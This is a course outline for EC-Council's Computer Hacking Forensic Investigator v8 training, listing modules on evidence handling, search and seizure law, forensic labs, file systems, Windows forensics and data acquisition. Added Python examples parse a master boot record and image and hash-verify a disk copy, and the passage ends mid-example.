EC-Council CHFI Computer Hacking Forensic Investigator v.8
Course Number: 312-49

Course Overview
Computer hacking forensic investigation is the process of detecting hacking attacks, properly extracting the evidence needed to report the crime, and conducting audits to prevent future attacks. Computer forensics is the application of computer investigation and analysis techniques to determine potential legal evidence. Evidence might be sought in a wide range of computer crime or misuse, including but not limited to theft of trade secrets, theft or destruction of intellectual property, and fraud. CHFI investigators can draw on an array of methods for discovering data that resides in a computer system and for recovering deleted, encrypted, or damaged file information. This course prepares you to pass the EC0 312-49 exam and achieve Computer Hacking Forensic Investigator (CHFI) certification.

Career Academy is an EC-Council endorsed training provider. We have invited the best security trainers in the industry to help us develop the ultimate training and certification program, which includes everything you will need to fully prepare for and pass your certification exam. This officially endorsed product gives our students access to the exam by providing you with an EC-Council Authorization Code. The Authorization Code can be used at any Prometric center; it is required and mandatory for you to schedule and pay for your exam. Without this Authorization Code, Prometric will not accept any request to schedule and take the exam.

Note: The cost of the exam is not included in this package.

Prerequisites
It is strongly recommended that students take the CEH course before beginning the CHFI program.
Audience
This course is of significant benefit to police and other law enforcement personnel, defense and military personnel, e-business security professionals, systems administrators, legal professionals, banking, insurance and other professionals, government agencies, and IT managers.

Certification Exam
This course prepares you for the EC-Council Computer Hacking Forensic Investigator exam 312-49.

Course Outline

Course Introduction (2m)
  Course Introduction

Module 00 - Student Introduction (6m)
  Student Introduction; CHFIv8 Course Outline; EC-Council Certification Program; Computer Hacking Forensic Investigator Track; CHFIv8 Exam Information; What Does CHFI Teach You?; CHFI Class Speed; Let's Start Forensics Investigation!

Module 01 - Computer Forensics in Today's World (1h 8m)
  Module Flow: Computer Forensics -- Forensics Science; Computer Forensics; Security Incident Report; Aspects of Organizational Security; Evolution of Computer Forensics; Objective of Computer Forensics; Need for Computer Forensics
  Module Flow: Forensics Readiness -- Benefits of Forensics Readiness; Goals of Forensics Readiness; Forensics Readiness Planning
  Module Flow: Cyber Crimes -- Cyber Crime; Computer Facilitated Crimes; Modes of Attacks; Examples of Cyber Crime; Types of Computer Crimes; Cyber Criminals; Organized Cyber Crime: Organizational Chart; How Serious are Different Types of Incidents?
  (Cyber Crimes, continued) Disruptive Incidents to the Business; Cost Expenditure Responding to the Security Incident
  Module Flow: Cyber Crime Investigation -- Cyber Crime Investigation; Key Steps in Forensics Investigation; Rules of Forensics Investigation; Need for Forensics Investigator; Role of Forensics Investigator; Accessing Computer Forensics Resources; Role of Digital Evidence
  Module Flow: Corporate Investigations -- Understanding Corporate Investigations; Approach to Forensics Investigation: A Case Study; Instructions for the Forensic Investigator to Approach the Crime Scene; Why and When Do You Use Computer Forensics?; Enterprise Theory of Investigation (ETI); Legal Issues; Reporting the Results
  Module Flow: Reporting a Cyber Crime -- Why You Should Report Cybercrime; Reporting Computer-Related Crimes; Person Assigned to Report the Crime; When and How to Report an Incident?; Who to Contact at the Law Enforcement; Federal Local Agents Contact; More Contacts; CIO Cyberthreat Report Form
  Module 01 Review

Module 02 - Computer Forensics Investigation Process (1h 20m)
  Computer Forensics Investigation Process; Investigating Computer Crime; Before the Investigation; Build a Forensics Workstation; Building the Investigation Team; People Involved in Computer Forensics; Review Policies and Laws; Forensics Laws; Notify Decision Makers and Acquire Authorization; Risk Assessment; Build a Computer Investigation Toolkit; Steps to Prepare for a Computer Forensics Investigation
  Computer Forensics Investigation Methodology: Obtain Search Warrant -- Obtain Search Warrant; Example of Search Warrant; Searches Without a Warrant
  Computer Forensics Investigation Methodology: Evaluate and Secure the Scene -- Forensics Photography; Gather the Preliminary Information at the Scene; First Responder
  Computer Forensics Investigation Methodology: Collect the Evidence -- Collect Physical Evidence; Evidence Collection Form; Collect Electronic Evidence; Guidelines for Acquiring Evidence
  Computer Forensics Investigation Methodology: Secure the Evidence -- Secure the Evidence; Evidence Management; Chain of Custody; Chain of Custody Form
  Computer Forensics Investigation Methodology: Acquire the Data -- Original Evidence Should NEVER Be Used for Analysis; Duplicate the Data (Imaging); Verify Image Integrity; Demo - HashCalc; MD5 Hash Calculators: HashCalc, MD5 Calculator and HashMyFiles; Recover Lost or Deleted Data; Data Recovery Software
  Computer Forensics Investigation Methodology: Analyze the Data -- Data Analysis; Data Analysis Tools
  Computer Forensics Investigation Methodology: Assess Evidence and Case -- Evidence Assessment; Case Assessment; Processing Location Assessment; Best Practices to Assess the Evidence
  Computer Forensics Investigation Methodology: Prepare the Final Report -- Documentation in Each Phase; Gather and Organize Information; Writing the Investigation Report; Sample Report (1 of 7) through (7 of 7)
  Computer Forensics Investigation Methodology: Testify as an Expert Witness -- Expert Witness; Testifying in the Court Room; Closing the Case; Maintaining Professional Conduct; Investigating a Company Policy Violation; Computer Forensics Service Providers
  Module 02 Review

Module 03 - Searching and Seizing Computers (1h 27m)
  Module Flow: Searching and Seizing Computers without a Warrant -- Searching and Seizing Computers without a Warrant; Fourth Amendment's "Reasonable Expectation of Privacy" in Cases Involving Computers: Principles; Reasonable Expectation of Privacy in Computers as Storage Devices; Reasonable Expectation of Privacy and Third-Party Possession; Private Searches; Use of Technology to Obtain Information; Exceptions to the Warrant Requirement in Cases Involving Computers; Consent; Scope of Consent; Third-Party Consent; Implied Consent; Exigent Circumstances; Plain View; Search Incident to a Lawful Arrest; Inventory Searches; Border Searches; International Issues; Special Case: Workplace Searches; Private Sector Workplace Searches; Public-Sector Workplace Searches
  Module Flow: Searching and Seizing Computers with a Warrant -- Searching and Seizing Computers with a Warrant; Successful Search with a Warrant; Basic Strategies for Executing Computer Searches; When Hardware Is Itself Contraband, Evidence, or an Instrumentality or Fruit of Crime; When Hardware Is Merely a Storage Device for Evidence of Crime; The Privacy Protection Act; The Terms of the Privacy Protection Act; Application of the PPA to Computer Searches and Seizures; Civil Liability Under the Electronic Communications Privacy Act (ECPA); Considering the Need for Multiple Warrants in Network Searches; No-Knock Warrants; Sneak-and-Peek Warrants; Privileged Documents; Drafting the Warrant and Affidavit; Accurately and Particularly Describe the Property to Be Seized in the Warrant and/or Attachments; Defending Computer Search Warrants Against Challenges Based on the "Things to be Seized"; Establish Probable Cause in the Affidavit; Explanation of the Search Strategy and Practical & Legal Considerations; Post-Seizure Issues; Searching Computers Already in Law Enforcement Custody; The Permissible Time Period for Examining Seized Computers; Rule 41(e) Motions for Return of Property
  Module Flow: The Electronic Communications Privacy Act -- The Electronic Communications Privacy Act; Providers of Electronic Communication Service vs. Remote Computing Service; Classifying Types of Information Held by Service Providers; Compelled Disclosure Under ECPA; Voluntary Disclosure; Working with Network Providers
  Module Flow: Electronic Surveillance in Communications Networks -- Electronic Surveillance in Communications Networks; Content vs. Addressing Information; The Pen/Trap Statute; The Wiretap Statute ("Title III"); Exceptions to Title III; Remedies For Violations of Title III and the Pen/Trap Statute
  Module Flow: Evidence -- Evidence; Authentication; Hearsay; Other Issues
  Module 03 Review

Module 04 - Digital Evidence
  Module Flow: Digital Data -- Definition of Digital Evidence; Increasing Awareness of Digital Evidence; Challenging Aspects of Digital Evidence; The Role of Digital Evidence; Characteristics of Digital Evidence; Fragility of Digital Evidence; Anti-Digital Forensics (ADF)
  Module Flow: Types of Digital Data -- Types of Digital Data
  Module Flow: Rules of Evidence -- Rules of Evidence; Best Evidence Rule; Federal Rules of Evidence; International Organization on Computer Evidence (IOCE); IOCE International Principles for Digital Evidence; Scientific Working Group on Digital Evidence (SWGDE); SWGDE Standards for the Exchange of Digital Evidence
  Module Flow: Electronic Devices: Types and Collecting Potential Evidence -- Electronic Devices: Types and Collecting Potential Evidence
  Module Flow: Digital Evidence Examination Process
    Evidence Assessment -- Evidence Assessment; Prepare for Evidence Acquisition
    Evidence Acquisition -- Preparation for Searches; Seizing the Evidence; Imaging; Demo - Disk Sterilization with DD; Bit-Stream Copies; Write Protection; Evidence Acquisition; Evidence Acquisition from Crime Location; Acquiring Evidence from Storage Devices; Demo - Utilizing hdparm for HD Information; Collecting Evidence; Collecting Evidence from RAM; Collecting Evidence from a Standalone Network Computer; Chain of Custody; Chain of Evidence Form
    Evidence Preservation -- Preserving Digital Evidence: Checklist; Preserving Removable Media; Handling Digital Evidence; Store and Archive Digital Evidence Findings
    Evidence Examination and Analysis -- DO NOT WORK on the Original Evidence; Evidence Examination; Physical Extraction; Logical Extraction; Analyze Host Data; Analyze Storage Media; Analyze Network Data; Analysis of Extracted Data; Timeframe Analysis; Data Hiding Analysis; Application and File Analysis; Ownership and Possession
    Evidence Documentation and Reporting -- Documenting the Evidence; Evidence Examiner Report; Final Report of Findings; Computer Evidence Worksheet; Hard Drive Evidence Worksheet; Removable Media Worksheet
  Module Flow: Electronic Crime and Digital Evidence Consideration by Crime Category -- Electronic Crime and Digital Evidence Consideration by Crime Category
  Module 04 Review

Module 05 - First Responder Procedures (1h 59m)
  Module Flow: First Responder -- Electronic Evidence; First Responder; Roles of First Responder; Electronic Devices: Types and Collecting Potential Evidence
  Module Flow: First Responder Toolkit -- First Responder Toolkit; Creating a First Responder Toolkit; Evidence Collecting Tools and Equipment
  Module Flow: First Response Basics -- First Response Rule; Incident Response: Different Situations; First Response for System Administrators; First Response by Non-Laboratory Staff; First Response by Laboratory Forensics Staff
  Module Flow: Securing and Evaluating Electronic Crime Scene -- Securing and Evaluating Electronic Crime Scene: A Checklist; Securing the Crime Scene; Warrant for Search and Seizure; Planning the Search and Seizure; Initial Search of the Scene; Health and Safety Issues
  Module Flow: Conducting Preliminary Interviews -- Questions to Ask When Client Calls the Forensic Investigator; Consent; Sample of Consent Search Form; Witness Signatures; Conducting Preliminary Interviews; Conducting Initial Interviews; Witness Statement Checklist
  Module Flow: Documenting Electronic Crime Scene -- Documenting Electronic Crime Scene; Photographing the Scene; Sketching the Scene; Video Shooting the Crime Scene
  Module Flow: Collecting and Preserving Electronic Evidence -- Collecting and Preserving Electronic Evidence; Order of Volatility; Dealing with Powered On Computers; Demo - Imaging RAM; Demo - Parsing RAM; Dealing with Powered Off Computers; Dealing with Networked Computer; Dealing with Open Files and Startup Files; Operating System Shutdown Procedure; Example Computers and Servers; Preserving Electronic Evidence; Seizing Portable Computers; Switched On Portables; Collecting and Preserving Electronic Evidence Wrap-up
  Module Flow: Packaging and Transporting Electronic Evidence -- Evidence Bag Contents List; Packaging Electronic Evidence; Exhibit Numbering; Transporting Electronic Evidence; Handling and Transportation to the Forensics Laboratory; Storing Electronic Evidence; Chain of Custody; Simple Format of the Chain of Custody Document; Chain of Custody Forms; Chain of Custody on Property Evidence Envelope/Bag and Sign-out Sheet; Demo - Hardware Inventories
  Module Flow: Reporting the Crime Scene -- Reporting the Crime Scene; Note Taking Checklist; First Responder Common Mistakes
  Module 05 Review

Module 06 - Computer Forensics Lab (2h 5m)
  Module Flow: Setting a Computer Forensics Lab -- Computer Forensics Lab; Planning for a Forensics Lab; Budget Allocation for a Forensics Lab; Physical Location Needs of a Forensics Lab; Structural Design Considerations; Environmental Conditions; Electrical Needs; Communication Needs; Work Area of a Computer Forensics Lab; Ambience of a Forensics Lab; Ambience of a Forensics Lab: Ergonomics; Physical Security Recommendations; Fire-Suppression Systems; Evidence Locker Recommendations; Computer Forensic Investigator; Law Enforcement Officer; Lab Director; Forensics Lab Licensing Requisite; Features of the Laboratory Imaging System; Technical Specifications of the Laboratory Based Imaging System; Forensics Lab (1 of 3) through (3 of 3); Auditing a Computer Forensics Lab; Recommendations to Avoid Eyestrain
  Module Flow: Investigative Services in Forensics -- Computer Forensics Investigative Services; Computer Forensic Investigative Service Sample; Computer Forensics Services: PenrodEllis Forensic Data Discovery; Data Destruction Industry Standards; Computer Forensics Services
  Module Flow: Computer Forensics Hardware -- Equipment Required in a Forensics Lab; Forensic Workstations; Basic Workstation Requirements in a Forensics Lab; Stocking the Hardware Peripherals
    Paraben Forensics Hardware: Handheld First Responder Kit; Wireless StrongHold Bag; Wireless StrongHold Box; Passport StrongHold Bag; Device Seizure Toolbox; Project-a-Phone; Lockdown; iRecovery Stick; Data Recovery Stick; Chat Stick; USB Serial DB9 Adapter; Mobile Field Kit
    Portable Forensic Systems and Towers: Forensic Air-Lite VI MK III Laptop; Original Forensic Tower II and Forensic Solid Steel Tower; Portable Forensic Workhorse V: Tableau 335 Forensic Drive Bay Controller; Forensic Air-Lite IV MK II; Forensic Air-Lite V MK III; Forensic Tower IV Dual Xeon; Ultimate Forensic Machine
    Forensic Write Protection Devices and Kits: Ultimate Forensic Write Protection Kit II-ES; Tableau T3u Forensic SATA Bridge Write Protection Kit; Tableau T8 Forensic USB Bridge Kit/Addonics Mini DigiDrive READ ONLY 12-in-1 Flash Reader; Tableau TACC 1441 Hardware Accelerator; Multiple TACC1441 Units; Tableau TD1 Forensic Duplicator; Power Supplies and Switches
    Digital Intelligence Forensic Hardware: FRED SR (Dual Xeon); FRED-L; FRED SC; Forensic Recovery of Evidence Data Center (FREDC); Rack-A-TACC; FREDDIE; UltraKit; UltraBay II; UltraBlock SCSI; Micro Forensic Recovery of Evidence Device; HardCopy 3P
    Wiebetech: Forensics DriveDock v4; Forensic UltraDock v4; Drive eRazer; v4 Combo Adapters; ProSATA SS8; HotPlug
    Cellebrite: UFED System; UFED Physical Pro; UFED Ruggedized
    DeepSpar: Disk Imager Forensic Edition; 3D Data Recovery (Phase 1 Tool: PC-3000 Drive Restoration System; Phase 2 Tool: DeepSpar Disk Imager; Phase 3 Tool: PC-3000 Data Extractor)
    InfinaDyne Forensic Products: Robotic Loader Extension for CD/DVD Inspector; Robotic System Status Light
    Image MASSter: Solo-4 (Super Kit); RoadMASSter-3; WipeMASSter; WipePRO; Rapid Image 7020CS IT
    Logicube: Forensic MD5; Forensic Talon; Portable Forensic Lab; CellDEK; Forensic Quest-2; NETConnect; RAID I/O Adapter; GPStamp; OmniPort; Desktop WritePROtects; USB Adapter; CloneCard Pro; EchoPlus; OmniClone IDE Laptop Adapters; Cables
    VoomTech: HardCopy 3P; SHADOW 2
  Module Flow: Computer Forensics Software -- Basic Software Requirements in a Forensics Lab; Main Operating System and Application Inventories
    Imaging Software: R-drive Image (Demo - R-Drive Image); P2 eXplorer Pro; AccuBurn-R for CD/DVD Inspector; Flash Retriever Forensic Edition
    File Conversion Software: FileMerlin; SnowBatch; Zamzar
    File Viewer Software: File Viewer; Quick View Plus 11 Standard Edition; Demo - File Viewers
    Analysis Software: P2 Commander (screenshot); DriveSpy; SIM Card Seizure; CD/DVD Inspector; Video Indexer (Vindex)
    Monitoring Software: Device Seizure (screenshots); Deployable P2 Commander (DP2C); ThumbsDisplay (screenshot); Email Detective
    Computer Forensics Software: DataLifter; X-Ways Forensics (Demo - X-Ways Forensics); LiveWire Investigator
  Module 06 Review

Module 07 - Understanding Hard Disks and File Systems (3h 59m)
  Module Flow: Hard Disk Drive Overview -- Disk Drive Overview; Hard Disk Drive; Solid-State Drive (SSD); Physical Structure of a Hard Disk; Logical Structure of Hard Disk; Types of Hard Disk Interfaces; Hard Disk Interfaces: ATA, SCSI, IDE/EIDE, USB, Fibre Channel; Disk Platter; Tracks; Track Numbering; Sector; Advanced Format: Sectors; Sector Addressing; Cluster; Cluster Size; Changing the Cluster Size; Demo - Cluster Size; Slack Space; Demo - Slack Space; Lost Clusters; Bad Sector; Hard Disk Data Addressing; Disk Capacity Calculation; Demo - Calculating Disk Capacity; Measuring the Performance of the Hard Disk
  Module Flow: Disk Partitions and Boot Process -- Disk Partitions; Demo - Partitioning Linux; Master Boot Record; Structure of a Master Boot Record; Demo - Backing Up the MBR; What is the Booting Process?
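The Module 07 items above (Sector Addressing, Cluster Size, Slack Space, Disk Capacity Calculation, Structure of a Master Boot Record, Demo - Backing Up the MBR) are only named in this outline. As an added worked example, not part of the course material, the following Python parses a 512-byte MBR of the kind `dd if=/dev/sda of=mbr.bin bs=512 count=1` backs up, decodes the packed CHS fields, converts between CHS and LBA, and does the capacity and slack arithmetic the module covers. The sample MBR, its partition layout, the disk signature and the 255-head/63-sector geometry are constructed assumptions, as is the partial partition-type table.

```python
"""Parse a classic MBR (446 bytes of boot code, four 16-byte partition entries at
offset 446, 0x55AA signature at offset 510) and do the CHS/LBA and capacity
arithmetic that goes with it. Added example; the sample MBR is constructed."""
import struct

SECTOR_SIZE = 512                    # legacy sector size (Advanced Format drives expose 4096)
PART_TABLE_OFFSET = 446
ENTRY_SIZE = 16
BOOT_SIGNATURE = b"\x55\xaa"
HEADS, SECTORS_PER_TRACK = 255, 63   # usual BIOS translation geometry (assumed)

# Small subset of partition type IDs; the full table is much longer.
PARTITION_TYPES = {0x05: "extended (CHS)", 0x07: "NTFS/exFAT", 0x0B: "FAT32 (CHS)",
                   0x0C: "FAT32 (LBA)", 0x0F: "extended (LBA)", 0x82: "Linux swap",
                   0x83: "Linux", 0xEE: "GPT protective"}


def lba_to_chs(lba, heads=HEADS, spt=SECTORS_PER_TRACK):
    """Sector addressing: LBA -> (cylinder, head, sector); sectors count from 1."""
    cyl, rem = divmod(lba, heads * spt)
    head, sec = divmod(rem, spt)
    return cyl, head, sec + 1


def chs_to_lba(cyl, head, sec, heads=HEADS, spt=SECTORS_PER_TRACK):
    return (cyl * heads + head) * spt + (sec - 1)


def encode_chs(cyl, head, sec):
    """Pack CHS into the 3-byte MBR field: head; cylinder bits 8-9 in the top two
    bits of byte 1 above the 6-bit sector; cylinder bits 0-7 in byte 2."""
    return bytes([head & 0xFF, ((cyl >> 2) & 0xC0) | (sec & 0x3F), cyl & 0xFF])


def decode_chs(raw):
    head = raw[0]
    sec = raw[1] & 0x3F
    cyl = ((raw[1] & 0xC0) << 2) | raw[2]
    return cyl, head, sec


def parse_mbr(mbr):
    """Return (disk signature, non-empty partition entries with byte offsets) or
    raise if the 0x55AA signature is missing (wiped or non-MBR first sector)."""
    if len(mbr) < 512 or mbr[510:512] != BOOT_SIGNATURE:
        raise ValueError("no 0x55AA boot signature at offset 510: not a valid MBR")
    disk_signature = struct.unpack_from("<I", mbr, 440)[0]   # Windows disk signature
    parts = []
    for i in range(4):
        off = PART_TABLE_OFFSET + i * ENTRY_SIZE
        status, chs_start, ptype, chs_end, lba_start, count = struct.unpack(
            "<B3sB3sII", mbr[off:off + ENTRY_SIZE])
        if ptype == 0x00:
            continue                                      # empty slot
        parts.append({
            "index": i, "bootable": status == 0x80, "type": ptype,
            "type_name": PARTITION_TYPES.get(ptype, "unknown 0x%02x" % ptype),
            "chs_start": decode_chs(chs_start), "chs_end": decode_chs(chs_end),
            "lba_start": lba_start, "sectors": count,
            "byte_offset": lba_start * SECTOR_SIZE,       # where to seek in the image
            "size_bytes": count * SECTOR_SIZE,
        })
    return disk_signature, parts


def chs_capacity_bytes(cylinders, heads, spt, bytes_per_sector=SECTOR_SIZE):
    """Disk capacity from geometry: cylinders x heads x sectors/track x bytes/sector."""
    return cylinders * heads * spt * bytes_per_sector


def slack_bytes(file_size, cluster_size):
    """File slack: bytes between logical EOF and the end of the last allocated cluster."""
    clusters = -(-file_size // cluster_size)              # ceiling division
    return clusters * cluster_size - file_size


def build_sample_mbr():
    """Constructed MBR: a bootable 100 MiB NTFS partition at LBA 2048 (1 MiB
    alignment) followed by a 200 MiB Linux partition. Not from a real disk."""
    mbr = bytearray(512)
    mbr[0:3] = b"\xeb\x63\x90"                             # jump into boot code
    struct.pack_into("<I", mbr, 440, 0x1A2B3C4D)           # made-up disk signature
    for i, (status, ptype, lba, count) in enumerate(
            [(0x80, 0x07, 2048, 204800), (0x00, 0x83, 206848, 409600)]):
        struct.pack_into("<B3sB3sII", mbr, PART_TABLE_OFFSET + i * ENTRY_SIZE,
                         status, encode_chs(*lba_to_chs(lba)), ptype,
                         encode_chs(*lba_to_chs(lba + count - 1)), lba, count)
    mbr[510:512] = BOOT_SIGNATURE
    return bytes(mbr)


if __name__ == "__main__":
    # On a real image this would be open("disk.dd", "rb").read(512).
    sig, parts = parse_mbr(build_sample_mbr())
    print("disk signature 0x%08x" % sig)
    for p in parts:
        print(p)
    print("1024 x 16 x 63 CHS limit in bytes:", chs_capacity_bytes(1024, 16, 63))
    print("slack for a 5000-byte file in 4 KiB clusters:", slack_bytes(5000, 4096))
```

The `byte_offset` field is what you pass to a loop-mount or to a file system parser when working from a full-disk image rather than a partition image; a partition whose CHS and LBA fields disagree, or a first sector without the 0x55AA signature, is itself a finding worth recording.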
  (Disk Partitions and Boot Process, continued) Essential Windows System Files; Windows 7 Boot Process; Macintosh Boot Process; http://www.bootdisk.com
  Module Flow: Understanding File Systems -- Understanding File Systems; Types of File Systems; List of Disk File Systems; List of Network File Systems; List of Special Purpose File Systems; List of Shared Disk File Systems; Windows File Systems; Popular Windows File Systems; File Allocation Table (FAT); FAT File System Layout; FAT Partition Boot Sector; FAT Structure; FAT Folder Structure; Directory Entries and Cluster Chains; Filenames on FAT Volumes; Examining FAT; FAT32; New Technology File System (NTFS); NTFS Architecture; NTFS System Files; NTFS Partition Boot Sector; Cluster Sizes of NTFS Volume; NTFS Master File Table (MFT); Metadata Files Stored in the MFT; NTFS Files and Data Storage; NTFS Attributes; NTFS Data Stream; NTFS Compressed Files; Setting the Compression State of a Volume; Encrypting File System (EFS); Components of EFS; Operation of Encrypting File System; EFS Attribute; Encrypting a File; EFS Recovery Key Agent; Tool: Advanced EFS Data Recovery; Tool: EFS Key; Sparse Files; Deleting NTFS Files; Registry Data; Examining Registry Data; FAT vs. NTFS; Linux File Systems; Popular Linux File Systems; Linux File System Architecture; Ext2; Ext3; Mac OS X File Systems; HFS vs. HFS Plus; HFS; HFS Plus; HFS Plus Volumes; HFS Plus Journal; Sun Solaris 10 File System: ZFS; CD-ROM / DVD File System; CDFS; Demo - Multi-session Discs
  Module Flow: RAID Storage System -- RAID Storage System; RAID Level 0: Disk Striping; RAID Level 1: Disk Mirroring; RAID Level 3: Disk Striping with Parity; RAID Level 5: Block Interleaved Distributed Parity; RAID Level 10: Blocks Striped and Mirrored; RAID Level 50: Mirroring and Striping across Multiple RAID Levels; Different RAID Levels; Comparing RAID Levels; Recover Data from Unallocated Space Using File Carving Process
  Module Flow: File System Analysis Using the Sleuth Kit (TSK) -- Tool: The Sleuth Kit (TSK); The Sleuth Kit (TSK): fsstat; The Sleuth Kit (TSK): istat (1 of 4) through (4 of 4); The Sleuth Kit (TSK): fls and img_stat; Demo - TSK and Autopsy
  Module 07 Review

Module 08 - Windows Forensics (3h 37m)
  Module Flow: Collecting Volatile Information -- Volatile Information; System Time; Logged-On Users; Logged-On Users: PsLoggedOn Tool; Logged-On Users: net sessions Command; Logged-On Users: LogonSessions Tool; Open Files; Open Files: net file Command; Open Files: PsFile Utility; Open Files: Openfiles Command; Network Information; Network Connections; Demo - Netstat Command; Process Information; Process-to-Port Mapping; Process Memory; Network Status; Demo - ipconfig; Other Important Information; Demo - Clipboard Viewer
  Module Flow: Collecting Non-Volatile Information -- Non-Volatile Information; Examine File Systems; Registry Settings; Microsoft Security ID; Event Logs; Index.dat File; Demo - Grabbing Registry Files; Devices and Other Information; Slack Space; Virtual Memory; Swap File; Windows Search Index; Collecting Hidden Partition Information; Demo - Gparted; Hidden ADS Streams; Investigating ADS Streams: StreamArmor; Other Non-Volatile Information
  Module Flow: Windows Memory Analysis -- Memory Dump; EProcess Structure; Process Creation Mechanism; Parsing Memory Contents; Parsing Process Memory; Extracting the Process Image; Collecting Process Memory
  Module Flow: Windows Registry Analysis -- Inside the Registry; Registry Structure within a Hive File; The Registry as a Log File; Registry Analysis; System Information; TimeZone Information; Shares; Audit Policy; Wireless SSIDs; Autostart Locations; System Boot; User Login; User Activity; Enumerating Autostart Registry Locations; USB Removable Storage Devices; Mounted Devices; Finding Users (with screenshots); Tracking User Activity; The UserAssist Keys; MRU Lists; Search Assistant; Connecting to Other Systems; Analyzing Restore Point Registry Settings; Determining the Startup Locations; Demo - RegRipper
  Module Flow: Cache, Cookie, and History Analysis -- Cache, Cookie, and History Analysis in IE; in Firefox; in Chrome; Analysis Tools: IECookiesView, IECacheView, IEHistoryView, MozillaCookiesView, MozillaCacheView, MozillaHistoryView, ChromeCookiesView, ChromeCacheView, ChromeHistoryView
  Module Flow: MD5 Calculation -- Message Digest Function: MD5; Why MD5 Calculation?
  (MD5 Calculation, continued) MD5 Hash Calculators: HashCalc, MD5 Calculator and HashMyFiles; MD5 Checksum Verifier; ChaosMD5
  Module Flow: Windows File Analysis -- Recycle Bin; System Restore Points (Rp.log Files); System Restore Points (Change.log.x Files); Prefetch Files; Shortcut Files; Word Documents; PDF Documents; Image Files; File Signature Analysis; NTFS Alternate Data Streams; Executable File Analysis; Documentation Before Analysis; Static Analysis Process; Search Strings; PE Header Analysis; Import Table Analysis; Export Table Analysis; Dynamic Analysis Process; Creating Test Environment; Collecting Information Using Tools; Process of Testing the Malware
  Module Flow: Metadata Investigation -- Metadata; Types of Metadata; Metadata in Different File Systems; Metadata in PDF Files; Metadata in Word Documents; Tool: Metadata Analyzer
  Module Flow: Text Based Logs -- Understanding Events; Event Logon Types; Event Record Structure; Vista Event Logs (with screenshots); IIS Logs; Parsing IIS Logs; Parsing FTP Logs; FTP sc-status Codes; Parsing DHCP Server Logs; Parsing Windows Firewall Logs; Using the Microsoft Log Parser
  Module Flow: Other Audit Events -- Evaluating Account Management Events; Examining Audit Policy Change Events; Examining System Log Entries; Examining Application Log Entries (with screenshot)
  Module Flow: Forensic Analysis of Event Logs -- Searching with Event Viewer; Using EnCase to Examine Windows Event Log Files; Windows Event Log Files Internals
  Module Flow: Windows Password Issues -- Understanding Windows Password Storage; Cracking Windows Passwords Stored on Running Systems; Exploring Windows Authentication Mechanisms; LanMan Authentication Process; NTLM Authentication Process; Kerberos Authentication Process; Sniffing and Cracking Windows Authentication Exchanges; Cracking Offline Passwords
  Module Flow: Forensics Tools -- Windows Forensics Tool: OS Forensics; Windows Forensics Tool: Helix3 Pro (screenshot); Integrated Windows Forensics Software: X-Ways Forensics (screenshot); X-Ways Trace; Windows Forensic Toolchest (WFT); Built-in Tool: Sigverif; Computer Online Forensic Evidence Extractor (COFEE); System Explorer; Tool: System Scanner; SecretExplorer; Registry Viewer Tools: Registry Viewer, RegScanner, Alien Registry Viewer; MultiMon; CurrProcess; Process Explorer; Security Task Manager; PrcView; ProcHeapViewer; Memory Viewer Tool: PMDump; Word Extractor; Belkasoft Evidence Center; Belkasoft Browser Analyzer; Metadata Assistant; HstEx; XpoLog Center Suite (screenshot); LogViewer Pro; Event Log Explorer; LogMeister; ProDiscover Forensics; PyFlag; LiveWire Investigator; ThumbsDisplay (screenshot); DriveLook
  Module 08 Review

Module 09 - Data Acquisition and Duplication (2h 53m)
  Module Flow: Data Acquisition and Duplication Concepts -- Data Acquisition; Forensic and Procedural Principles; Types of Data Acquisition Systems; Data Acquisition Formats; Bit Stream vs. Backups; Why to Create a Duplicate Image?
  (Data Acquisition and Duplication Concepts, continued) Issues with Data Duplication; Data Acquisition Methods; Determining the Best Acquisition Method; Contingency Planning for Image Acquisitions; Data Acquisitions Mistakes
  Module Flow: Data Acquisition Types -- Rules of Thumb; Static Data Acquisition; Collecting Static Data; Demo - Forensic Imaging Using Linux; Demo - Forensic Imaging Using Windows; Static Data Collection Process; Live Data Acquisition; Why Volatile Data is Important?; Volatile Data; Order of Volatility; Common Mistakes in Volatile Data Collection; Volatile Data Collection Methodology; Basic Steps in Collecting Volatile Data; Types of Volatile Information; Demo - WinTaylors
  Module Flow: Disk Acquisition Tool Requirements -- Disk Imaging Tool Requirements; Disk Imaging Tool Requirements: Mandatory; Disk Imaging Tool Requirements: Optional
  Module Flow: Validation Methods -- Validating Data Acquisitions; Linux Validation Methods; Windows Validation Methods
  Module Flow: RAID Data Acquisition -- Understanding RAID Disks; Acquiring RAID Disks; Remote Data Acquisition
  Module Flow: Acquisition Best Practices -- Acquisition Best Practices
  Module Flow: Data Acquisition Software Tools -- Acquiring Data on Windows; Acquiring Data on Linux; dd Command; dcfldd Command; Extracting the MBR; Netcat Command; EnCase Forensic (screenshot); Analysis Software: DriveSpy; ProDiscover Forensics; AccessData FTK Imager; Mount Image Pro; Data Acquisition Toolbox; SafeBack; ILookPI (screenshot); RAID Recovery for Windows; R-Tools R-Studio; F-Response; PyFlag; LiveWire Investigator; ThumbsDisplay
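Module 09 names dd, dcfldd and the Linux and Windows validation methods, and Module 02 names Verify Image Integrity, without showing the workflow. The following Python is an added example written for this outline, not Career Academy or EC-Council material: it performs the same bit-stream copy as `dd if=/dev/sdb of=sdb.dd bs=64K` while hashing the data in the same read pass, as `dcfldd hash=md5,sha256` does, then re-reads the finished image to validate it and shows that a single flipped byte is caught. The "device" is a constructed file in a temporary directory; the paths, block size and sample contents are assumptions.

```python
"""Bit-stream acquisition with in-line hashing, then image validation.
Added example; the 'device' below is a constructed file, not a real disk."""
import hashlib
import os
import tempfile

BLOCK_SIZE = 65536   # the bs= you would hand to dd; larger blocks mean fewer syscalls


def _digests():
    return {"md5": hashlib.md5(), "sha256": hashlib.sha256()}


def acquire_image(source_path, image_path, block_size=BLOCK_SIZE):
    """Copy every byte of source_path to image_path, hashing the data as it is
    read. The acquisition hash therefore describes exactly the bytes read from
    the original, which is opened read-only and never modified."""
    hashes = _digests()
    total = 0
    with open(source_path, "rb") as src, open(image_path, "wb") as dst:
        while True:
            block = src.read(block_size)
            if not block:
                break
            for h in hashes.values():
                h.update(block)
            dst.write(block)
            total += len(block)
    return {"bytes": total, **{k: h.hexdigest() for k, h in hashes.items()}}


def hash_file(path, block_size=BLOCK_SIZE):
    """Independent re-read of a file; this is the validation pass over the image."""
    hashes = _digests()
    total = 0
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(block_size), b""):
            for h in hashes.values():
                h.update(block)
            total += len(block)
    return {"bytes": total, **{k: h.hexdigest() for k, h in hashes.items()}}


def verify_image(acquisition, image_path):
    """Compare the finished image against the acquisition record. Both digests
    must match. MD5 is kept because older tools and case files expect it, but it
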